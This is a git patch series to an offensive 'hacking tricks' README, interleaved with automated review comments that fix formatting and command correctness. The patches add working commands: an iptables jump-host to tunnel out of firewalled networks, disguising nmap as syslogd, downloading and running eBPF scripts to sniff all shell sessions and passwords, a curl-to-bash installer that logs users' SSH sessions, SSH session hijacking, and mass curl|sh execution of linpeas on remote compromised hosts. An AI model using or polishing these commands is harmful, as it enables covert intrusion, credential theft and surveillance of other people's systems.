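Review bot: same setext-heading hazard here: the `---` inserted at @@ -925 (after the "Two CTRL-d are required ..." note), @@ -1019 (after "A list of our favorite public upload sites.") and @@ -1060 (after "A noisier solution is syncthing.") follows paragraph text, and without a blank line in between CommonMark renders those sentences as H2 headings rather than drawing a rule. The inserts after a closing fence (@@ -873, @@ -949, @@ -981, @@ -997, @@ -1097) are fine as they are.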
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 9 Nov 2023 11:56:58 +0000 Subject: [PATCH 49/56] Update README.md --- README.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/README.md b/README.md index 96d30b5..8780b40 100644 --- a/README.md +++ b/README.md @@ -31,6 +31,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Tunnel and forwarding](#tunnel) 1. [Raw TCP reverse ports](#ports) 1. [HTTPS reverse forwards](#https) + 2. [Bouncing traffic with iptables](#iptables) 1. [Use any tool via Socks Proxy](#scan-proxy) 1. [Find your public IP address](#your-ip) 1. [Check reachability from around the world](#check-reachable) 
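Review bot: the new TOC entry at @@ -31 is written as `2.` while every other entry in this list uses `1.`; Markdown renders it the same, but it breaks the file's convention. It also links to `#iptables`, and bold `**3.iii.c ...**` lines do not get auto-generated anchors the way `#` headings do, so the body hunk in this patch must carry an explicit matching anchor or the entry dead-links.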
@@ -548,6 +549,33 @@ curl -x socks5h://0 ipinfo.io More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvesec/port-forwarding) and [Tunnel via Cloudflare to any TCP Service](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) and [Awesome Tunneling](https://github.com/anderspitman/awesome-tunneling). +--- + +**3.iii.c Bouncing traffic with iptables*** + +Use the host 192.168.0.100 as a Jump-Host: Forward any connection from anywhere to 192.168.0.100:53 onwards to 1.2.3.4:443. +```sh +FPORT=53 +DSTIP=1.2.3.4 +DPORT=443 +echo 1 >/proc/sys/net/ipv4/ip_forward + +iptables -t mangle -I PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188 +iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark + +iptables -t nat -I PREROUTING -p tcp -m mark --mark 1188 -j DNAT --to ${DSTIP:?}:${DPORT:?} +iptables -I FORWARD -m mark --mark 1188 -j ACCEPT + +iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE +iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark + +iptables -t mangle -I INPUT -m mark --mark 1188 -j ACCEPT +iptables -t mangle -I INPUT -j CONNMARK --restore-mark +``` +> We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. +> GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh +> GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ... + --- **3.iv. Use any tool via Socks Proxy** From 9195ace1bfa12d9473016f855871de25482b2814 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 9 Nov 2023 12:00:26 +0000 Subject: [PATCH 50/56] ipt JumpHost --- README.md | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 8780b40..7b1932d 100644 --- a/README.md +++ b/README.md 
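Review bot: the new heading `**3.iii.c Bouncing traffic with iptables***` has three closing asterisks, which leaves a literal `*` after the bold text when rendered. In the quoted usage lines, `GS_HOST=1.2.3.4:` carries a trailing colon that is not part of an address and should read `GS_HOST=1.2.3.4`, matching `DSTIP=1.2.3.4` in the block above. On the rule set itself: the two `-t mangle -I INPUT` rules are not on the path of the bounced connection (a DNATed packet is routed to FORWARD, not INPUT), so either they serve a purpose worth a comment or they can go; and the `-m addrtype --dst-type LOCAL` match is what stops the MARK rule from tagging transit traffic on port 53, which deserves a one-line comment since it is the non-obvious part of the block.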
@@ -572,9 +572,16 @@ iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark iptables -t mangle -I INPUT -m mark --mark 1188 -j ACCEPT iptables -t mangle -I INPUT -j CONNMARK --restore-mark ``` -> We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. -> GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh -> GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ... + +We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. +```sh +# Deploy on a target that can only reach 192.168.0.100 +GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh +``` +```sh +# Access the target +GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ... +``` --- From 1e41a78449022cb1a6bbda9500fff1dc98370d9a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 10 Nov 2023 09:54:10 +0000 Subject: [PATCH 51/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7b1932d..43d2666 100644 --- a/README.md +++ b/README.md @@ -152,7 +152,7 @@ screen -x MyName Alternatively if there is no Bash: ```sh -cp `which nmap` syslogd +cp "$(command -v nmap)" syslogd PATH=.:$PATH syslogd -T0 10.0.2.1/24 ``` In this example we execute *nmap* but let it appear with the name *syslogd* in *ps alxwww* process list. From 180b8650ce39ee607956952867fb1fb73ff02aa5 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 10 Nov 2023 10:10:44 +0000 Subject: [PATCH 52/56] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 43d2666..c636be4 100644 --- a/README.md +++ b/README.md 
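Review bot: the trailing colon in `GS_HOST=1.2.3.4:` survives the move into fenced blocks; it should be `GS_HOST=1.2.3.4`. Splitting the two commands into separate fences is an improvement, but the comments should say where each is typed: the first block runs on the target that can only reach 192.168.0.100, the second on your workstation, and the two `GS_HOST` values differ precisely because they are run from different vantage points.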
@@ -84,13 +84,13 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [SSH session sniffing and hijaking](#ssh-sniffing) +1. [SSH session sniffing and hijacking](#ssh-sniffing) 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) 2. [Sniff all SHELL sessions with dtrace](#dtrace) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) - 1. [Hijak / Take-over a running SSH session](#hijak) + 1. [Hijack / Take-over a running SSH session](#hijack) 1. [VPN and Shells](#vpn-shell) 1. [Disposable Root Servers](#shell) 1. [VPN/VPS Providers](#vpn) @@ -1779,8 +1779,8 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` - -**9.vi Hijak / Take-over a running SSH session** + +**9.vi Hijack / Take-over a running SSH session** Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh From 376095318ae0d56f5f1b08f1e8884e76b085c884 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 13 Nov 2023 19:48:45 +0000 Subject: [PATCH 53/56] Update README.md --- README.md | 22 ++++++++++++++++++---- 1 file changed, 18 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index c636be4..c530af2 100644 --- a/README.md +++ b/README.md 
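Review bot: the TOC link changes from `#hijak` to `#hijack`, but the `-`/`+` pair directly above the renamed heading at @@ -1779 has no visible content in this view, which is where the matching anchor line would sit; confirm that line now carries `id="hijack"` as well, otherwise the corrected TOC entry dead-links.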
@@ -87,6 +87,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [SSH session sniffing and hijacking](#ssh-sniffing) 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) 2. [Sniff all SHELL sessions with dtrace](#dtrace) + 2. [Sniff all SHELL sessions with eBPF](#bpf) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) @@ -1716,8 +1717,21 @@ Start a dtrace and log to /tmp/.log: (dtrace -sd >/tmp/.log &) ``` + +**9.iii Sniff all SHELL sessions with eBPF** + +eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux. + +```sh +curl -o bpftrace -fsSL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace +chmod 755 bpftrace +curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/ptysnoop.bt +./bpftrace -Bnone ptysnoop.bt +``` +Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks). + -**9.iii Sniff a user's outgoing SSH session with strace** +**9.iv Sniff a user's outgoing SSH session with strace** ```sh strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done ``` @@ -1725,7 +1739,7 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a -**9.iv. Sniff a user's outgoing SSH session with a wrapper script** +**9.v. Sniff a user's outgoing SSH session with a wrapper script** Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions) 
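Review bot: the new eBPF block at @@ -1716 downloads `bpftrace` from `releases/latest` and `ptysnoop.bt` from a branch head and runs them as root without pinning a version or verifying a checksum. bpftrace's script language has changed between releases, so `ptysnoop.bt` may stop parsing on a newer `latest`; pin a release tag for the binary and publish its SHA-256 next to the command so readers can check what they fetched. Also, the TOC entry is added as a second `2.` under the dtrace entry while the rest of the list is `1.`, and the `#bpf` link needs an explicit anchor above the new bold heading.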
@@ -1771,7 +1785,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH. -**9.v Sniff a user's outgoing SSH session using SSH-IT** +**9.vi Sniff a user's outgoing SSH session using SSH-IT** The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). @@ -1780,7 +1794,7 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` -**9.vi Hijack / Take-over a running SSH session** +**9.vii Hijack / Take-over a running SSH session** Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh From 83a0f152f26420614b9d3531402250f54da41a3a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 18 Nov 2023 23:30:35 +0000 Subject: [PATCH 54/56] Update README.md --- README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/README.md b/README.md index c530af2..ad8c781 100644 --- a/README.md +++ b/README.md @@ -18,6 +18,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Hide a process as root](#hide-a-process-root) 1. [Hide scripts](#hide-scripts) 1. [Hide from cat](#cat) + 1. [Execute in parrallel with separate logfiles](#parallel) 1. [SSH](#ssh) 1. [Almost invisible SSH](#ssh-invisible) 1. [SSH tunnel](#ssh-tunnel) 
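Review bot: `parrallel` in the new TOC entry at @@ -18 is misspelled; the body heading added in the same patch spells it `parallel`, so the link text should agree (the `#parallel` target itself is fine).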
@@ -285,6 +286,21 @@ echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(a ### it. The $'\r' is a bash special to create a \r (carriage return). ``` + +**1.ix. Execute in parallel with separate logfiles*** + +Scan 20 hosts in parallel and log each result to a separate log file: +```sh +# hosts.txt contains a long list of hostnames or ip-addresses +cat hosts.txt | parallel -j20 'nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' +``` + +Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: +```sh +# secrets.txt contains a long list of gsocket-secrets for each remote server. +cat secrets.txt | parallel -j20 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' +``` + --- ## 2. SSH From e68b798c70f045fcdede34c3216df2112d4e0b43 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 18 Nov 2023 23:36:38 +0000 Subject: [PATCH 55/56] Update README.md --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index ad8c781..60eb56d 100644 --- a/README.md +++ b/README.md 
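Review bot: the heading `**1.ix. Execute in parallel with separate logfiles***` has a stray third asterisk that renders as a literal `*`. The Linpeas paragraph says "using 40 workers" but the command passes `-j20`. Both examples also go through `cat file | parallel ...`; GNU parallel reads an argument file directly with `parallel -j20 '...' :::: hosts.txt`, which drops the extra process and the pipe.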
@@ -298,9 +298,11 @@ cat hosts.txt | parallel -j20 'nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: ```sh # secrets.txt contains a long list of gsocket-secrets for each remote server. -cat secrets.txt | parallel -j20 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' +cat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' ``` +Note: `xargs -P20 -I{}` is another good way but it cant log each output into separate file. + --- ## 2. SSH From 068af0e019526a7c6a938bd3f2cb1384697f3b52 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 19 Nov 2023 07:57:37 +0000 Subject: [PATCH 56/56] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 60eb56d..0171e34 100644 --- a/README.md +++ b/README.md 
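Review bot: the added note claims `xargs -P20 -I{}` cannot log each output to a separate file, which is not quite right: the redirection only has to happen inside a shell that xargs runs, e.g. `xargs -P20 -I{} sh -c 'nmap -n -Pn -sCV -F --open "$1" >nmap_"$1".txt' _ {}`. The real difference is that GNU parallel does the per-job redirection and quoting for you, so suggest rewording to "is another option but needs a `sh -c` wrapper for per-host logfiles".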
@@ -292,16 +292,16 @@ echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(a Scan 20 hosts in parallel and log each result to a separate log file: ```sh # hosts.txt contains a long list of hostnames or ip-addresses -cat hosts.txt | parallel -j20 'nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' +cat hosts.txt | parallel -j20 'exec nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' ``` +Note: The example uses `exec` to replace the underlying shell with the last process (nmap, gsexec). It's optional but reduces the number of running shell binaries. Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: ```sh # secrets.txt contains a long list of gsocket-secrets for each remote server. cat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' ``` - -Note: `xargs -P20 -I{}` is another good way but it cant log each output into separate file. +Note: `xargs -P20 -I{}` is another good way but it cannot log each output into a separate file. ---
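Review bot: the new `exec` note sits after the nmap block but explains both `nmap` and `gsexec`, and `gsexec` only appears in the block that follows; move the note below the Linpeas block or drop the `gsexec` mention so it does not refer to a command the reader has not seen yet. Worth adding to the note: `exec` replaces the shell that parallel spawned, so any command placed after it on the same line never runs, which is fine in both examples only because `exec` is the last command on each line.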